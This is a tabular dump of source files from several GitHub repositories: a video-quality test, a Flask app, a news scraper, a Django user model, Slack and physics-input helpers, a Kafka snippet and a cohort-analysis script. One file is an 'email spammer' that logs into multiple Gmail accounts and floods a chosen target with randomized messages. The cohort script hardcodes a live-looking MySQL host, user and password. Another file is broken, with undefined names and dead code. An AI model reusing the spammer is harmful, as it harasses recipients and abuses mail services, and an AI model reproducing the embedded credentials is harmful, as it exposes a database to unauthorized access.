seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
11845591367 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os, json, subprocess
from tempfile import NamedTemporaryFile
cur_dir = os.path.dirname(os.path.abspath(__file__))
file_path = cur_dir + "/../eval_video.py"
def run_and_check_result(cmd):
    """Run an eval_video.py command and validate its JSON result.

    Runs *cmd* twice: first reading the JSON payload from stdout, then a
    second time with ``--output <tmpfile>`` and reading the payload from
    that file.  In both cases the payload must contain a float ``video``
    score in [0, 100].

    Raises:
        subprocess.CalledProcessError: if the command exits non-zero.
        AssertionError: if the result payload is malformed.
    """
    cmd_result = subprocess.run(cmd, check=True, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT, encoding="utf8")
    _assert_valid_score(json.loads(cmd_result.stdout))
    # Re-run with --output and verify the same payload lands in the file.
    with NamedTemporaryFile('w+t') as output:
        # Build a new list instead of mutating the caller's cmd in place
        # (the original cmd.extend() leaked the --output flag back to callers).
        file_cmd = cmd + ["--output", output.name]
        subprocess.run(file_cmd, check=True, stdout=subprocess.PIPE,
                       stderr=subprocess.STDOUT, encoding="utf8")
        _assert_valid_score(json.loads(output.read()))


def _assert_valid_score(data):
    """Assert that *data* holds a float 'video' score in [0, 100]."""
    assert "video" in data
    # isinstance is the idiomatic type check; type(...) == float rejects
    # subclasses and reads poorly.
    assert isinstance(data["video"], float)
    assert 0 <= data["video"] <= 100
def check_video_vmaf(src_video, dst_video):
    """Run a plain VMAF comparison between two container videos."""
    run_and_check_result([
        "python3", file_path,
        "--video_eval_method", "vmaf",
        "--src_video", src_video,
        "--dst_video", dst_video,
    ])
def check_yuv_video_vmaf(src_video, dst_video, video_size, pixel_format, bitdepth):
    """Run a VMAF comparison for raw YUV inputs, which need explicit metadata."""
    args = [
        "python3", file_path,
        "--video_eval_method", "vmaf",
        "--src_video", src_video,
        "--dst_video", dst_video,
        "--video_size", video_size,
        "--pixel_format", pixel_format,
        "--bitdepth", bitdepth,
    ]
    run_and_check_result(args)
def check_align_video_vmaf(src_video, dst_video, align_method):
    """Run a VMAF comparison, optionally adding a frame-alignment method."""
    args = ["python3", file_path, "--video_eval_method", "vmaf",
            "--src_video", src_video, "--dst_video", dst_video]
    if align_method:
        args += ["--frame_align_method", align_method]
    run_and_check_result(args)
def test_y4m_yuv_compare(y4m_video, yuv_video):
    """VMAF must accept y4m/yuv sources in either src/dst order."""
    first, second = y4m_video["path"], yuv_video["path"]
    check_video_vmaf(first, second)
    check_video_vmaf(second, first)
def test_yuv_yuv_compare(yuv_video):
    """VMAF self-comparison of a raw YUV video against itself."""
    path = yuv_video["path"]
    check_yuv_video_vmaf(
        path,
        path,
        video_size=yuv_video["video_size"],
        pixel_format=yuv_video["pixel_format"],
        bitdepth=yuv_video["bitdepth"],
    )
def test_y4m_align_compare(y4m_video, align_method):
src_video = y4m_video["path"]
dst_video = y4m_video["path"]
check_align_video_vmaf(src_video, dst_video, align_method) | OpenNetLab/Challenge-Environment | metrics/tests/test_eval_video.py | test_eval_video.py | py | 2,516 | python | en | code | 8 | github-code | 6 | [
{
"api_name": "os.path.dirname",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "subprocess.run",
"line_... |
13480667519 | import requests, os, json
from flask import Flask, render_template, redirect, url_for, request
from dotenv import load_dotenv
from anvil import Anvil, User
load_dotenv()
app = Flask(__name__)
anvil = Anvil()
user = anvil.load_user()
worlds = anvil.load_worlds(user)
anvil.current_world = worlds[0]
@app.route('/', methods=['POST', 'GET'])
def index():
    """Home page: shows the current world and lets the user switch worlds."""
    # A POST comes from the world-selector form; switch the active world.
    if request.method == 'POST':
        anvil.current_world = anvil.get_world(worlds, request.form["world"])
    return render_template('index.html', name=user.name, worlds=worlds, current_world=anvil.current_world)
@app.route('/new_article', methods=['POST', 'GET'])
def new_article():
    """Render the new-article form; on submit, redirect back to the home page."""
    if request.method == 'POST':
        # Bug fix: url_for() takes the *endpoint name* (the view function's
        # name), not a URL path — url_for("/") raised BuildError at runtime.
        return redirect(url_for("index"))
    return render_template('new_article.html', name=user.name, worlds=worlds, current_world=anvil.current_world)
if __name__ == "__main__":
app.run(debug=True) | oaster2000/NPC-Writer | app.py | app.py | py | 898 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "anvil.Anvil",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "anvil.load_user",
"line_n... |
17915780851 | import smtplib
import re
import sys
import getpass
import random
import math
import time
import os
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.header import Header
import socket
socket.setdefaulttimeout(10)
"""
created by sayansree paria
verson<1.0>
"""
userId=[]
password=[]
print("\n\n\n\temail spammer v1.0\n\tdevlovper sayansree paria\n\tinitiating dummy Ids import.... ")
path=os.path.dirname(os.path.realpath(__file__))
try:
file=open(path+'\\Attribute.dat','r')
lines=file.readlines()
for i in lines:
userId.append(i.split('|')[0])
password.append(i.split('|')[1])
del lines
except FileNotFoundError:
print ("please define attributes.dat")
#raise
sys.exit(0)
except:
print("unexpected fatal error encountered while accessing Attributes\nmake sure code has access permition")
#raise
sys.exit(0)
else:
print ("\tdummy IDs successfully imported")
finally:
file.close()
def check(email):
    """Exit the program if *email* is not a plausible address.

    Bug fixes versus the original pattern ``[\\w\\.-_]+@[\\w]+\\.com``:
    the class ``\\.-_`` formed an accidental character *range* ('.' through
    '_', which matched digits, uppercase, '/', ';', ...), the domain only
    allowed a single label ending in .com, and the tail was unanchored so
    trailing junk was accepted.  This version accepts dots/plus/hyphens in
    the local part and any dotted domain with an alphabetic TLD.
    """
    if not re.match(r"[\w.+-]+@[\w-]+(\.[\w-]+)*\.[A-Za-z]{2,}$", email):
        print('\tinvalid email format')
        # Abort the whole run: downstream logic requires valid IDs.
        sys.exit(0)
print('\tprechecking ID format...\n')
if(len(userId)==0):
print('\nno IDs detected\nplease redefine Attribute file')
#raise TypeError('userids not in format')
sys.exit(0)
for i in userId:
check(i)
print(i+'\tvalid')
print('\tprecheck succesful')
print('\n\t{num} dummies will be used '.format(num=len(userId)))
print('\tInitiating authentication process\n\tthis may take several minutes')
module=[]
for i in range(len(userId)):
try:
server =smtplib.SMTP('smtp.gmail.com',587)
except :
print('\ncheck your internet connection')
sys.exit(0)
else:
print('connection established\t\t' + userId[i])
try:
server.starttls()
server.login(userId[i],password[i])
module.append(server)
del server
except smtplib.SMTPConnectError:
print('\nconnection error')
server.quit()
except smtplib.SMTPAuthenticationError:
print('\nauthentication failed'+userId[i]+'*'*5+password[i][-3:])
server.quit()
except:
print('\nunexpected error')
server.quit()
raise
else:
print('succesfully authinticated\t\t'+userId[i])
##needs sighting
target=input('enter target username:\t')
print('\t checking email')
check(target)
print(target+'\tvalid')
itr=input('enter no of attacks:\t')
print('\timporting payload')
payload=[]
try:
file=open(path+'\\payload.txt','r')
lines=file.readlines()
for i in lines:
payload.append(i)
del lines
except FileNotFoundError:
print ("please define payload.txt")
sys.exit(0)
except:
print("unexpected fatal error encountered while accessing payload\nmake sure code has access permition")
sys.exit(0)
else:
print ("\tpayload successfully imported")
finally:
file.close()
tim=3.5*int(itr)
print('\tinitiating payload injection\n\t expected time {0}min,{1}sec'.format(tim%60,tim//60))
sublist=payload[0].split('|')
for i in range(int(itr)):
rand=math.floor(random.random()*len(userId))
msg= MIMEMultipart()
msg['From'] = userId[rand]
msg['To']= target
msg['Subject']= sublist[math.floor(random.random()*len(sublist))]
body= payload[ 1+math.floor(random.random()*(len(payload)-1))]
msg.attach(MIMEText(body,'html'))
module[rand].sendmail(msg['From'],msg['To'],msg.as_string())
del msg
print('payload <{0}> using {1} successful '.format(i+1,userId[rand]))
time.sleep(2+random.random()*3)# some improvement required
print('\t terminating server connections')
for i in module:
i.quit()
print('\t payload successful\n\t devloper sayansree paria\n\t build v<1.0>')
| Sayansree/email_spammer | spammer1.0.py | spammer1.0.py | py | 3,987 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "socket.setdefaulttimeout",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpat... |
12608050279 | # Train model
import sys
import time
import numpy as np
import torch.optim as optim
import pickle
import os
import torch.utils.data
import model as m
import argparse
if __name__ == '__main__':
    # NOTE(review): argparse is imported both at module top and here.
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("--doc_len", type=int, default=300)
    parser.add_argument("--lr", type=float, default=0.001)
    parser.add_argument("--batchSize", type=int, default=32)
    parser.add_argument("--num_workers", type=int, default=4)
    parser.add_argument("--flg_cuda", action='store_true')
    parser.add_argument("--optType", default='Adam')
    parser.add_argument("--logInterval", type=int, default=1)  # Print test accuracy every n epochs
    parser.add_argument("--flgSave", action='store_true')
    parser.add_argument("--savePath", default='./')
    parser.add_argument("--randSeed", type=int, default=42)
    parser.add_argument("--inputPath", default="../aclImdb/df07f20K_stopEng_W_1gram/")
    parser.add_argument("--modelPath")
    args = parser.parse_args()
    torch.manual_seed(args.randSeed)  # For reproducible results
    if not os.path.isdir(args.savePath):
        os.mkdir(args.savePath)
    print('General parameters: ', args)
    print("Loading Data")
    # if args.modelName in ['Enc_SumLSTM', 'Enc_CNN_LSTM']:
    #trainset = m.MovieDataset(args.inputPath, 'train.json', transform=m.padToTensor(args.doc_len))
    testset = m.MovieDataset(args.inputPath, 'test.json', transform=m.padToTensor(args.doc_len))
    print('To Loader')
    if args.flg_cuda:
        #train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batchSize, shuffle=True, pin_memory=True)
        test_loader = torch.utils.data.DataLoader(testset, batch_size=args.batchSize, shuffle=False, pin_memory=True)
    else:
        #train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batchSize, shuffle=True, pin_memory=False)
        test_loader = torch.utils.data.DataLoader(testset, batch_size=args.batchSize, shuffle=False, pin_memory=False)
    print("Loading model")
    if args.flg_cuda:
        model = torch.load(args.modelPath + '_model.pt')
        model = model.cuda()
    else:
        # Map CUDA-saved tensors onto CPU storage when no GPU is requested.
        model = torch.load(args.modelPath + '_model.pt', map_location=lambda storage, loc: storage)
    print(model)
    if args.optType == 'Adam':
        opt = optim.Adam(model.params, lr=args.lr)
    elif args.optType == 'SGD':
        opt = optim.SGD(model.params, lr=args.lr)
    print("Beginning Training")
    train_paras = {'log_interval': [args.logInterval, 1000], 'flg_cuda': args.flg_cuda,
                   'flgSave': args.flgSave, 'savePath': args.savePath}
    # NOTE(review): this rebinds the module alias 'm' to the trainer
    # instance, shadowing the imported 'model' module from here on.
    m = m.trainModel(train_paras, None, test_loader, model, opt)
    m._test(0)
| jingsliu/NLP_HW | HW1/code/eval.py | eval.py | py | 2,761 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.optim.manual_seed",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "os.path.i... |
22291138485 | import re
import requests
from bs4 import BeautifulSoup
def scrape_page_title(soup):
    """Return the article headline with every newline stripped out."""
    raw = soup.find('h1', class_='content__headline').get_text()
    return raw.replace('\n', '')
def scrape_page_topic(soup):
    """Return the article's topic label, or '-' when none is present."""
    try:
        raw = soup.find('span', class_='label__link-wrapper').get_text()
    except AttributeError:
        # find() returned None: no label element on this page.
        return "-"
    return raw.replace('\n', '')
def scrape_page_authors(soup):
    """Return all author names joined with ' & '."""
    names = []
    for el in soup.find_all('span', itemprop="name"):
        names.append(re.sub('\n', '', el.get_text()))
    return ' & '.join(names)
def scrape_page_datetime(soup):
    """Return the first publication date, with NBSPs turned into spaces."""
    stamps = [t.get_text().replace('\n', '') for t in
              soup.find_all('time', itemprop="datePublished")]
    # Raises IndexError if the page has no datePublished element,
    # exactly like the original datetime[0] access.
    return stamps[0].replace('\xa0', ' ')
def scrape_page_description(soup):
    """Return the article standfirst text, or '-' when absent."""
    try:
        text = soup.find('div', class_="content__standfirst").get_text()
    except AttributeError:
        # find() returned None: the page has no standfirst block.
        return "-"
    return text.replace('\n', '')
def scrape_page_text(soup):
    """Return the article body as one space-joined string of its paragraphs."""
    body = soup.find('div', class_="content__article-body")
    return ' '.join(p.get_text() for p in body.find_all('p'))
def scrape_page_related_topics(soup):
    """Return the href of every related-topic link on the page."""
    hrefs = []
    for anchor in soup.find_all('a', class_='submeta__link'):
        hrefs.append(anchor['href'])
    return hrefs
def scrape_page(link):
    """Fetch *link* and return the article fields as a tuple:
    (title, link, topic, related_topics_links, authors, datetime,
    description, text)."""
    page = requests.get(link)
    soup = BeautifulSoup(page.content, 'html.parser')
    title = scrape_page_title(soup)
    link = link  # no-op self-assignment, kept as-is
    topic = scrape_page_topic(soup)
    related_topics_links = scrape_page_related_topics(soup)
    authors = scrape_page_authors(soup)
    datetime = scrape_page_datetime(soup)  # a display string, not a datetime object
    description = scrape_page_description(soup)
    text = scrape_page_text(soup)
    return title, link, topic, related_topics_links, authors, datetime, description, text
def home_page(link):
    """Return the unique article links found on a topic/front page."""
    page = requests.get(link)
    soup = BeautifulSoup(page.content, 'html.parser')
    links = []
    for anchor in soup.find_all('a', class_='fc-item__link'):
        href = anchor['href']
        # Preserve first-seen order while dropping duplicates.
        if href not in links:
            links.append(href)
    return links
| mcmxlix/the_guardian_crawler | Crawler/scrape_infos.py | scrape_infos.py | py | 2,969 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "re.sub",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 32,
"usage_type":... |
5131582706 | from django.contrib.auth.models import AbstractUser
from django.db import models
class User(AbstractUser):
    """Custom user model with a role (user / moderator / admin)."""

    ADMIN = 'admin'
    MODERATOR = 'moderator'
    USER = 'user'
    USER_ROLE_CHOICES = [
        (ADMIN, 'admin'),
        (MODERATOR, 'moderator'),
        (USER, 'user'),
    ]
    # One-time code sent by email to confirm registration.
    confirmation_code = models.CharField(
        max_length=100,
        blank=True
    )
    username = models.CharField(
        max_length=150,
        unique=True,
        db_index=True
    )
    email = models.EmailField(
        verbose_name='Email',
        help_text='Введите адрес эл.почты',
        unique=True
    )
    bio = models.TextField(
        verbose_name='О пользователе',
        help_text='Расскажите о себе',
        blank=True,
        null=True
    )
    role = models.CharField(
        'Роль пользователя',
        max_length=20,
        choices=USER_ROLE_CHOICES,
        default=USER,
        blank=True,
    )

    @property
    def is_user(self):
        """True for plain users."""
        return self.role == self.USER

    @property
    def is_moderator(self):
        """True for moderators."""
        return self.role == self.MODERATOR

    @property
    def is_admin(self):
        """True for admins and Django staff accounts."""
        return self.role == self.ADMIN or self.is_staff

    class Meta:
        verbose_name = 'Пользователь'
        verbose_name_plural = 'Пользователи'

    def __str__(self):
        # Bug fix: the model has no 'name' field, so str(user) raised
        # AttributeError; use the username instead.
        return self.username
| Toksi86/yamdb_final | api_yamdb/users/models.py | models.py | py | 1,428 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.contrib.auth.models.AbstractUser",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.db.models.CharField",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "django.db.models",
"line_number": 15,
"usage_type": "name"
},
{
... |
20477618446 | from typing import List, Optional, Union
def _make_mrkdown_block(mrkdown: str):
"""
Wraps the mrkdown in a block kit block.
"""
return {
"type": "section",
"text": {
"type": "mrkdwn",
"text": mrkdown,
},
}
def _make_header_block(heading: str):
"""
Wraps the heading in a block kit block.
"""
return {
"type": "header",
"text": {
"type": "plain_text",
"text": heading,
},
}
def _make_block_message(
blocks: Union[None, str, dict, List[Union[str, dict]]],
header: Optional[str] = None,
visible_in_channel: bool = True,
):
"""
Generates slack block kit messages from a variety of input types.
str -> Wrap the str in a mrkdown section and in a top level response.
dict -> Wrap the dict in a top level response.
list -> Wrap the altered contents in a top level response.
str -> Wrap the str in a mrkdown section
dict -> add to top level response as is
"""
output_blocks: List[dict] = []
if blocks is None or blocks == "":
return {}
if isinstance(blocks, dict):
output_blocks = [blocks]
elif isinstance(blocks, list):
formatted_blocks = []
for block in blocks:
if isinstance(block, str):
formatted_blocks.append(_make_mrkdown_block(block))
if isinstance(block, dict):
formatted_blocks.append(block)
output_blocks = formatted_blocks
else:
output_blocks = [_make_mrkdown_block(str(blocks))]
if header:
output_blocks = [_make_header_block(header)] + output_blocks
return {
"blocks": output_blocks,
"response_type": "in_channel" if visible_in_channel else "ephemeral",
}
| henryivesjones/slash-slack | slash_slack/blocks.py | blocks.py | py | 1,823 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "typing.Union",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_numb... |
28237496421 | #!/usr/bin/python
from copy import deepcopy
from fodft_tools import *
import argparse
import os
import sys, traceback
from ase import Atoms
spec_path = "/data/schober/code/fhiaims_develop/fhiaims_supporting_work/species_defaults/"
aims_params = {
"xc" : "blyp",
"spin" : "collinear",
"occupation_type" : "gaussian 0.01",
"mixer" : "pulay",
"n_max_pulay" : "10",
"charge_mix_param" : "0.5",
"sc_accuracy_rho" : "1E-4",
"sc_accuracy_eev" : "1E-2",
"sc_accuracy_etot" : "1E-6",
"relativistic" : "none",
"species_dir" : "",
#"species_dir" : os.path.join(self.spec_path, self.avail_species[self.species])
}
# global parameters
#spec_path = "/data/schober/code/fhiaims_develop/fhiaims_supporting_work/species_defaults/"
avail_species = {"light" : "light",
"tight" : "tight",
"cc.3" : "non-standard/NAO-VCC-nZ/NAO-VCC-3Z",
"cc.4" : "non-standard/NAO-VCC-nZ/NAO-VCC-4Z",
"cc.5" : "non-standard/NAO-VCC-nZ/NAO-VCC-5Z",
"tight.ext" : "tight.ext",
"cc.3.ext" : "non-standard/NAO-VCC-nZ/NAO-VCC-3Z.ext"
}
parser = argparse.ArgumentParser(description="Get parameters for fodft")
parser.add_argument('filename', nargs='+', help='Geometry file with the dimer or a list(blob)')#, dest='filename')
parser.add_argument('-e, --extension', help='Format of the geometry file, if not .xyz', dest='fformat', metavar='FORMAT', default='xyz')
parser.add_argument('-d, --dir', help='-d = subfoldername, will create project files there', dest='dir', default='./')
parser.add_argument('-f, --full', help='Create inputs for basic and polarized fodft', dest='full', action="store_true")
parser.add_argument('-c, --cubes', help="Automatically adds cube output command for guessed states", dest="cubes", action="store_true")
parser.add_argument('-a, --automagic', help="Tries to find fragments by a clustering algorithm. Check the result carefully! See also:--cutoff", dest="magic", action="store_true")
parser.add_argument('--cutoff', help="Optional: Defines the cutoff for the clustering algorithm. Works best with values larger than inter-molecular distances and smaller than inter-molecular distances! Default is 1.7 for C-C-bonds!", dest="cutoff", type=float)
parser.add_argument('-o, --orbitals', help="FO-Orbitals for determination of matrix elements (form: state1 state2 range1 range2)", dest="orbitals", nargs='+', type=int)
parser.add_argument('-i, --image', help="If more than one geometry in .xyz (e.g. a trajectory), which image to choose? Default: Last structure", type=int, dest="image", default=0)
# additional, optinal arguments for the fodft-class
#parser.add_argument('-
arguments = parser.parse_args()
filename = arguments.filename
fformat = arguments.fformat
#if len(filename) > 1 and arguments.dir:
#print("Using one folder and more than one input doesn't work! Bye!")
#sys.exit()
#example = fo_aims(Atoms('CO', positions=[(0, 0, 0), (0, 0, 1)]), arguments.image-1)
#example.avail_species = avail_species
arg_dict = {
"xc" : ["Which XC functional (Default: blyp): ", "blyp"],
"charge_in" : ["Charges on [frag1], [frag2] (Default: +1 0]): ", "+1 0"],
"embedding" : ["Use embedding? [y/n] (Default: no): ", ".false."],
"species" : ["Specify basis set, available options: \n\n {0} \n\n(Default: tight). Please choose: ".format(avail_species.keys()), "tight"],
"fo_type" : ["FO_Type, hole or elec (Default: hole): ", "hole"],
}
# get params for fodft
arg_dict_values = deepcopy(arg_dict)
# First, get user input
for item in arg_dict:
arg_dict_values[item][1] = raw_input("{0}".format(arg_dict[item][0]))
# Fill up with defaults were no user input exists
for item in arg_dict_values:
if arg_dict_values[item][1] is "":
arg_dict_values[item][1] = arg_dict[item][1]
# Special post processing of inputs
if arg_dict_values['embedding'][1] == "y":
arg_dict_values['embedding'][1] = ".true."
elif arg_dict_values['embedding'][1] == "n":
arg_dict_values['embedding'][1] = ".false."
for file in filename:
system = fo_aims(file, arguments.image-1, fformat)
system.spec_path = spec_path
system.avail_species = avail_species
system.aims_params = aims_params
system.aims_params["species_dir"] = os.path.join(system.spec_path, system.avail_species[arg_dict_values["species"][1]])
if len(filename) > 1:
dirname = file.rpartition(".")[0]
if dirname == filename:
dirname = "fo" + dirname
arguments.dir = dirname
if arguments.dir == "./":
print("Creating files in current working directory ({0})".format(os.getcwd()))
else:
try:
cwd_start = os.getcwd()
os.mkdir(arguments.dir)
os.chdir(arguments.dir)
print("Creating files in {0}!".format(arguments.dir))
except:
print("Error when creating folder {0}:".format(arguments.dir))
raise
print("Creating basic and embedded input: {0}".format(arguments.full))
# Set the values.
system.aims_params['xc'] = arg_dict_values['xc'][1]
system.charge_in = arg_dict_values['charge_in'][1].strip("[]").split()
system.embedding = arg_dict_values['embedding'][1]
system.species = arg_dict_values['species'][1]
system.fo_type = arg_dict_values['fo_type'][1]
print("Got all information, now create the fragments!")
if arguments.magic:
if arguments.cutoff:
system.magic_cutoff = arguments.cutoff
system.magic_fragmentation()
else:
system.create_fragments()
if arguments.orbitals:
system.frontiers = arguments.orbitals[0:2]
system.fo_range = arguments.orbitals[2:4]
system.update_calculators()
if arguments.cubes is True:
system.set_cube_files()
if arguments.full is True:
print("Now creating input files for basic fo_dft...")
os.mkdir("basic")
os.mkdir("embedded")
cwd = os.getcwd()
os.chdir("basic")
#print("Now creating the input files!")
system.write_inputs()
os.chdir(cwd)
os.chdir("embedded")
print("Now creating input files for embedded fo_dft...")
system.embedding = ".true."
system.update_calculators()
system.set_cube_files()
system.write_inputs()
else:
print("Now creating the input files!")
system.write_inputs()
print("Done.")
try:
os.chdir(cwd_start)
except:
pass
| schober-ch/fodft_tools | fodft.py | fodft.py | py | 6,769 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "os.path",
"lin... |
33280054752 | # %%
import numpy as np
import pandas as pd
import datetime as dt
#from cohorts_pipeline_woof_v4 import df_cleaning
#from cohorts_pipeline_woof_v4 import cohorts_pipeline
import mysql.connector
from mysql.connector import Error
# %%
#df_og = pd.read_csv('./Data/orders.csv', sep=';', decimal=',')
query_orders = 'SELECT alo.Customer_ID, alo.Hashed_Email, alo.Conv_Date, alo.Conv_ID, CASE WHEN alo.Conv_Date = first_orders.first_date THEN "New" ELSE "Returning" END AS "Customer_Type", alo.Revenue, alo.Revenue_excl_VAT FROM api_shopware.api_shopware_orders alo JOIN ( SELECT Hashed_Email, MIN(Conv_Date) AS "first_date" FROM api_shopware.api_shopware_orders alo WHERE Account = "WOOOF" AND Conv_Status != "cancelled" GROUP BY 1) AS first_orders ON first_orders.Hashed_Email = alo.Hashed_Email WHERE Account = "WOOOF" AND Conv_Status != "cancelled" AND Shipping_Country = "Germany"'
#%%
try:
connection = mysql.connector.connect(host='attribution-system-fsg-new.cob86lv75rzo.eu-west-1.rds.amazonaws.com',
database='api_lightspeed',
user='fsg',
password='Attribution3.0')
if connection.is_connected():
db_Info = connection.get_server_info()
print("Connected to MySQL Server version ", db_Info)
cursor = connection.cursor()
cursor.execute("select database();")
record = cursor.fetchone()
print("Your connected to database: ", record)
df_og = pd.read_sql(query_orders,con=connection)
except Error as e:
print("Error while connecting to MySQL", e)
finally:
if (connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed")
#%%
#df_og.columns
df_og.head()
#%%
df_og.Conv_Date.max()
#%%
df = df_og.copy()
#%%
df.set_index('Customer_ID', inplace=True)
df['First_Order'] = df.groupby(level=0)['Conv_Date'].min()
df['First_Order_YM'] = df.groupby(level=0)['Conv_Date'].min().apply(lambda x: x.strftime('%Y-%m'))
df.reset_index(inplace=True)
df['Creation_Date_YM'] = df['Conv_Date'].apply(lambda x: x.strftime('%Y-%m'))
#%%
df['Year'] = df['Conv_Date'].dt.year
df['Week'] = df['Conv_Date'].dt.week
df['Year_Week'] = df['Conv_Date'].dt.strftime("%Y-%W")
#%%
df.head()
#%%
months = df['First_Order_YM'].unique()
output_dfs = {p: df[df['First_Order_YM'] == p] for p in months}
cohort_orders = pd.DataFrame()
cohort_customers = pd.DataFrame()
cohort_values = pd.DataFrame()
trans_summary = pd.DataFrame()
projections = pd.DataFrame()
rev_summary = pd.DataFrame()
rev_summary['New'] = df[df['Customer_Type']=='New'].groupby('Creation_Date_YM')['ValueNOVAT'].sum()
rev_summary['Returning'] = df[df['Customer_Type']=='Returning'].groupby('Creation_Date_YM')['ValueNOVAT'].sum()
#%%
from cohorts_pipeline_woof_v4 import df_cleaning
from cohorts_pipeline_woof_v4 import cohorts_pipeline
# %%
df = df_cleaning(df_og)
# %%
df.head()
# %%
transactions, reorder_rates = cohorts_pipeline(df)
#%%
transactions = transactions.fillna(0)
transactions.head()
# %%
transactions = transactions.astype(int)
# %%
reorder_rates = reorder_rates.astype(str)
# %%
reorder_rates = reorder_rates.apply(lambda x: x.str.replace('.',','))
reorder_rates = reorder_rates.apply(lambda x: x.str.replace('nan',''))
# %%
from gspread_pandas import Spread, Client
# %%
wooof_cohorts_data_dump = Spread('WOOOF_COHORTS_DUMP')
# %%
# Push Transactions
wooof_cohorts_data_dump.df_to_sheet(transactions, index=True, sheet='TRANSACTIONS_JULY', start='A1', replace=True)
wooof_cohorts_data_dump.df_to_sheet(reorder_rates, index=True, sheet='REORDER_RATES_JULY', start='A1', replace=True)
# %%
transactions
# %%
| rahichan/angela_legacy | WOOOF/WOOOF_COHORTS_BUILDER.py | WOOOF_COHORTS_BUILDER.py | py | 3,732 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "mysql.connector.connector.connect",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "mysql.connector.connector",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "mysql.connector",
"line_number": 15,
"usage_type": "name"
},
{
"... |
37975869389 | '''
Get completed data as Dataframe for charts
Calls to MongoDB for data
Test data is a separate module
'''
from datetime import datetime
session = {'defaults':{'trial':{"id":123, 'start_date':datetime.now().timestamp-(30*24*60*60)}}}
from test_data import get_test_data
from chart_frame import three_column_frame
test_struct={'group':{'name':'Trial_Id', 'label':'Trial_Id'},
'x_col':{'name':'trial_day', 'label':'Day'},
'y_col':{'name':'temp', 'label':'Temperature'}}
def test_chart_data():
    """Build the demo chart frame from the canned test data."""
    raw = get_test_data()
    return three_column_frame(raw, test_struct)
def env_data(trial_id, attribute):
    # environmental data for an individual trial
    # NOTE(review): this function cannot run as written —
    #   * it assigns start_date/end_date but then uses start_time/end_time,
    #     which are never defined (NameError on the print below);
    #   * SUCCESS, MongoUtil, DB, OB_COL, DataFrame and the *_caps constants
    #     are not defined/imported in this module;
    #   * everything after the first `return three_column_frame(...)` is
    #     unreachable dead code. Confirm intent before fixing.
    start_date = session["defaults"]['trial']["start_date"]
    end_date = datetime.now().timestamp()
    print("env_data", attribute, start_time, end_time)
    match = {"$match":{
        "trial.id":trial_id,
        "status.status_qualifier":SUCCESS,
        "subject.attribute.name": attribute,
        "$and":[{"time.timestamp":{"$gt":start_time}},
                {"time.timestamp":{"$lt":end_time}}]
    }}
    sort = {"$sort":{"time.timestamp":1}}
    query = [match, sort]
    mu = MongoUtil(DB)
    recs = mu.aggregate(DB, OB_COL, query)
    test_struct={'group':{'name':'Trial_Id', 'label':'Trial_Id'},
        'x_col':{'name':'trial_day', 'label':'Day'},
        'y_col':{'name':attribute, 'label':'Temperature'}}
    return three_column_frame(recs, test_struct)
    # Unreachable from here down (see NOTE above).
    ts = []
    value = []
    for doc in recs:
        #print(start_time, doc[TIME][TIMESTAMP], end_time)
        ts.append(doc["time"][TIME_STR])
        value.append(doc[SUBJECT][ATTRIBUTE][VALUE])
    return DataFrame({TIME:ts, attribute:value})
def test():
    """Smoke-test: build the demo chart frame and print it."""
    print("Test of test chart data")
    print(test_chart_data())
if __name__ == '__main__':
test()
| webbhm/MARSFarm-web_VX | gbet_charts/functions/hold/chart_data.py | chart_data.py | py | 1,935 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "datetime.datetime.now",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "test_data.get_test_data",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "chart_f... |
20420593181 | from confluent_kafka.admin import AdminClient, NewTopic
topic = 'Kafka_Image_Processing'
client_id = "admin_hagar"
conf = {'bootstrap.servers': "34.70.120.136:9094,35.202.98.23:9094,34.133.105.230:9094",
'client.id': client_id}
